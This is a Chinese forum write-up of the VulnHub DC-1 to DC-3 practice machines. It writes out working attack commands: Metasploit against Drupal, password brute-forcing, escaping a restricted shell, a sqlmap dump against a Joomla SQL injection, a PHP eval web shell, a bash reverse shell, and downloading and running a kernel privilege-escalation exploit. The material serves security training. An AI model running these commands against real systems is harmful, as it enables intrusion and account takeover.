首页
社区
课程
招聘
[原创]#30天写作挑战#vulnhub靶机练习:DC系列1-3
发表于: 2020-9-2 18:44 13060

[原创]#30天写作挑战#vulnhub靶机练习:DC系列1-3

2020-9-2 18:44
13060

DC-1

使用 arp-scan -l 看一下局域网中存活的主机


image.png


192.168.149.150,用 nmap 扫一下:nmap -A 192.168.149.150


image.png


可以看到有个 80 口开着,可以先去看一下是干啥的


image.png


一个用 drupal cms 搭建起来的网站,扫一波目录


image.png


访问一下 robots.txt,里面有个 UPGRANDE.txt


image.png


也就是说他现在版本是 7.x 的


image.png


用 msf 搜一下看看有没有现成的:


image.png


经过测试,使用 2018 年的那个可以


image.png


设置一下攻击目标:set RHOSTS 192.168.149.150

然后执行 exploit 开始攻击,成功之后直接 ls 就发现了 flag1.txt


image.png


cat 一下看看内容,告诉我们一个好的 cms 需要 config 文件,


image.png


去找一下这个 config 文件,Drupal的默认配置文件为 /var/www/sites/default/settings.php

同时找到了 flag2 和 数据库的用户名与密码


image.png


连接不上,自闭? python -c "import pty;pty.spawn('/bin/bash')" 这样开一个交互试试,nice


image.png


select * from users;,发现了 admin ,以及他密码的 hash 值


image.png


http://drupalchina.cn/node/2128

参考这个方法,把密码给改成 yichen,拿到 hash 后去 mysql 里面替换就可以了

$S$DAowqHa2RDeEsjEuWpJWUE28BF0Hs4QjzoFsMRb8Qvz9Hl87oJKj


image.png


update users set pass='$S$DAowqHa2RDeEsjEuWpJWUE28BF0Hs4QjzoFsMRb8Qvz9Hl87oJKj' where name='admin';


image.png


这时候再用 用户名: admin 密码:yichen 去登录网站就登陆成功了


image.png


在这个地方,发现 flag3,看一下内容


image.png


image.png


emmm,在 etc/passwd 看到 flag4 这个用户


image.png


在 home/flag4 下面放着 flag4.txt


image.png


提权:find / -user root -perm -4000 -print 2>/dev/null 可以发现 find


image.png


然后:find ./ -exec "/bin/sh" \;


image.png


最终,在 root 目录下发现 thefinalflag.txt


image.png


DC-2

nmap 扫描,发现仅有 80 和 7744,需要注意的是 http://dc-2,要改一下 host 文件,不然就会去访问:http://dc-2

image.png


改完以后就可以访问了 vim /etc/hosts


image.png


image.png


flag1...


image.png


使用 wpscan 扫描一下用户名 wpscan --url dc-2 -eu


image.png


扫出来三个用户名 admin、jerry、tom


image.png


提示我们的 cewl,它是一个社会工程学爬虫,可以从 http 页面爬取信息生成密码字典,然后再用 wpscan 爆破密码


image.png

Username: jerry, Password: adipiscing

Username: tom, Password: parturient


/wp-admin/是 WordPress 的默认管理员目录:用 jerry 用户进去,发现 flag2


image.png


用之前发现的 tom 用户去登陆 ssh 成功,然而 cat 竟然不能用!?

用 vi 试了一下,看到了 flag3.txt


image.png


另外,rbash 这个东西是用来限制输入命令的


image.png


依次执行这三条指令:

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin


image.png

绕过Linux受限Shell环境的技巧


image.png


看一下:/etc/passwd,尝试切换 jerry 用户,如果直接 ssh 登陆的话会提示:


image.png


切换成功:


image.png


拿到 flag4.txt


image.png


使用 sudo -l 看一下,git 命令可以以 root 权限执行,而且不需要密码


image.png


使用 sudo git -p --help,注意窗口不要拉得太大,不然没法输入东西了


image.png


image.png

DC-3

解决分配不到 IP 问题

扫描不到 IP,可能是网卡配置问题,先解决一下

打开 ova 文件默认联网方式是桥接,改成NAT

在开机选择的时候,摁 e 编辑一下


image.png


把 ro 改成 rw single init=/bin/bash


image.png


image.png


然后 ctrl+x,就可以输入东西了


image.png


ip a 查看一下实际用的是哪一个网卡


image.png


vim /etc/network/interfaces 看一下配置信息用的是哪一个网卡


image.png


把这俩都改成 ens33,然后 /etc/init.d/networking restart 重启网卡服务


image.png


ps.我是直接关了虚拟机的电源退出来的


成功扫到


image.png


开始打


这个靶机只有一个 flag 了,要 root 权限才能看

nmap 扫一波


image.png


ps.有个 whatweb 网站指纹扫描工具


image.png


还有个针对 Joomla 的扫描工具:joomscan --url http://192.168.149.157


image.png


搜一下:searchsploit Joomla 3.7.0


image.png


sqlmap 跑一下


image.png


最终的 sqlmap 命令

sqlmap -u "http://192.168.149.157/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D "joomladb" -T "#__users" -C name,password --dump -p list[fullordering]


image.png


把 password 的 hash 保存下来,使用 john 爆破,得到密码:snoopy


image.png


使用 admin/snoopy 登录


image.png


在这个地方写一句话


image.png


<?php  @eval($_POST['yichen']); ?>


image.png


蚁剑连接一下


image.png


本地监听一个端口:nc -lvp 8888


终端里面执行:

bash -c 'bash -i &>/dev/tcp/192.168.149.141/8888 0>&1'


image.png


lsb_release -a 可以看到是 ubuntu 16.04


image.png


searchsploit ubuntu 16.04,大佬们说这个可以用


image.png


cat 一下,让去下这个东西:

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip


image.png


unzip 39772.zip  #解压29772.zip文件

cd 39772

tar -xvf exploit.tar  #解压exploit提权脚本tar包

cd ebpf_mapfd_doubleput_exploit


image.png


./compile.sh   #执行脚本,编译文件

./doubleput  #执行提权文件


image.png


在 /root 目录下存着 flag


image.png


[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!

最后于 2020-9-3 11:03 被kanxue编辑 ,原因:
收藏
免费 2
支持
分享
最新回复 (1)
雪    币: 26205
活跃值: (63302)
能力值: (RANK:135 )
在线值:
发帖
回帖
粉丝
2

感谢分享!
欢迎更多的小伙伴参与到 #30天写作挑战#中来!活动详情:https://bbs.pediy.com/thread-261705.htm

2020-9-7 16:54
0
游客
登录 | 注册 方可回帖
返回
//